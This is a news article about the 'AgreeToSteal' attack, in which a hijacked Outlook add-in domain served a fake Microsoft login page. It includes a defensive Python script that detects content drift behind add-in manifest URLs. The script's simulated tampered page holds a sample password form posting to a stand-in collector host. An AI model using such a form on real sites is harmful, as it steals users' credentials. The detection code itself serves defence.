First Known Malicious Microsoft Outlook Add-in Detected in the Wild

A malicious Microsoft Outlook add-in has been discovered in the wild. The attack, known as “AgreeToSteal,” exploits a vulnerability in the Office add-in’s supply chain, allowing hackers to steal thousands of credentials. According to Koi Security, an unknown attacker hijacked a legitimate add-in’s domain to serve a fake Microsoft login page, capturing user passwords and exfiltrating sensitive data via a Telegram Bot API.

The Outlook add-in, AgreeTo, was developed as a calendar management tool. The attacker, however, took advantage of the add-in’s dynamic nature: its manifest points to content that is fetched from the developer’s server in real time. Exploiting this weakness let the attacker deploy malicious code and steal sensitive information.

Microsoft signed off on the add-in’s manifest but did not keep monitoring its content after approval. This gap let the attacker change what was served at the URL referenced by the manifest, redirecting users to a phishing kit. Koi Security recommends that Microsoft tighten its process, including re-reviewing manifests when they return different content and verifying domain ownership.
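The check Koi Security recommends can be automated on the marketplace side or by a defender reviewing add-ins deployed in their tenant: record a hash of whatever each manifest URL serves at approval time, then re-fetch and compare. The following is an added example written for this article, not code from Koi Security, Microsoft or the AgreeTo project. It parses a constructed manifest (the element and attribute names follow the Office add-in manifest schema, but the hostnames, paths and page bodies are invented), and it replaces the live HTTP fetch with a dictionary lookup so it runs offline; a real deployment would plug an HTTP client into the `fetch` parameter.

```python
"""Detect content drift behind the URLs an Office add-in manifest references."""
import hashlib
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed sample manifest. Hostnames and paths are invented for this example.
SAMPLE_MANIFEST = """<OfficeApp xmlns="http://schemas.microsoft.com/office/appforoffice/1.1"
           xmlns:bt="http://schemas.microsoft.com/office/officeappbasictypes/1.0"
           xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="MailApp">
  <Id>00000000-0000-0000-0000-000000000000</Id>
  <Version>1.0.0.0</Version>
  <DisplayName DefaultValue="Sample Calendar Add-in"/>
  <FormSettings>
    <Form xsi:type="ItemRead">
      <DesktopSettings>
        <SourceLocation DefaultValue="https://addin.example.com/taskpane.html"/>
      </DesktopSettings>
    </Form>
  </FormSettings>
  <VersionOverrides>
    <Resources>
      <bt:Urls>
        <bt:Url id="Commands.Url" DefaultValue="https://addin.example.com/commands.html"/>
      </bt:Urls>
    </Resources>
  </VersionOverrides>
</OfficeApp>
"""

TASKPANE_URL = "https://addin.example.com/taskpane.html"
COMMANDS_URL = "https://addin.example.com/commands.html"

# Constructed page bodies: what the URLs served when the add-in was reviewed ...
REVIEWED_CONTENT = {
    TASKPANE_URL: b"<html><body><h1>Calendar</h1><script src='app.js'></script></body></html>",
    COMMANDS_URL: b"<html><body><script src='commands.js'></script></body></html>",
}
# ... and what they serve later, after the task pane was swapped for a credential form.
LATER_CONTENT = dict(REVIEWED_CONTENT)
LATER_CONTENT[TASKPANE_URL] = (
    b"<html><body><form action='https://collector.example.net/login' method='post'>"
    b"<input name='password' type='password'></form></body></html>"
)


def extract_remote_urls(manifest_xml: str) -> list[str]:
    """Collect every http(s) URL held in a DefaultValue attribute, in document order.

    Walking all elements rather than matching specific tags keeps the check
    independent of which manifest sections (SourceLocation, bt:Url, ...) are present.
    """
    root = ET.fromstring(manifest_xml)
    urls: list[str] = []
    for element in root.iter():
        value = element.attrib.get("DefaultValue", "")
        if value.startswith(("http://", "https://")) and value not in urls:
            urls.append(value)
    return urls


def snapshot(urls: list[str], fetch) -> dict[str, str]:
    """Map each URL to the SHA-256 of the bytes it currently serves."""
    return {url: hashlib.sha256(fetch(url)).hexdigest() for url in urls}


def detect_drift(baseline: dict[str, str], current: dict[str, str],
                 approved_hosts: set[str]) -> list[tuple[str, str]]:
    """Compare a fresh snapshot against the approved baseline.

    Returns (finding, url) pairs: content that changed since review, URLs that
    appeared or disappeared, and URLs hosted outside the approved domains.
    """
    findings: list[tuple[str, str]] = []
    for url, digest in current.items():
        host = urlparse(url).hostname or ""
        if host not in approved_hosts:
            findings.append(("unapproved_host", url))
        if url not in baseline:
            findings.append(("new_url", url))
        elif baseline[url] != digest:
            findings.append(("content_changed", url))
    for url in baseline:
        if url not in current:
            findings.append(("removed_url", url))
    return findings


def run_check() -> list[tuple[str, str]]:
    """Baseline at review time, re-check later, report drift (offline simulation)."""
    urls = extract_remote_urls(SAMPLE_MANIFEST)
    baseline = snapshot(urls, REVIEWED_CONTENT.__getitem__)
    current = snapshot(urls, LATER_CONTENT.__getitem__)
    return detect_drift(baseline, current, approved_hosts={"addin.example.com"})


if __name__ == "__main__":
    for finding, url in run_check():
        print(f"{finding}: {url}")
```

A hash comparison is deliberately blunt: any change, benign or not, triggers re-review, which is the point of the recommendation. The `approved_hosts` check covers the second recommendation, tying each URL to a domain whose ownership was verified at approval, so that a later manifest version cannot quietly introduce a host that was never reviewed.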

This attack highlights the need for more frequent monitoring of packaged dependencies across marketplaces and repositories. The structural problem is not limited to Microsoft Marketplace or the Office Store, but applies to all marketplaces hosting remote dynamic dependencies. Experts warn that approving once and trusting forever is a recipe for disaster, as demonstrated by the AgreeToSteal attack.

Source: https://thehackernews.com/2026/02/first-malicious-outlook-add-in-found.html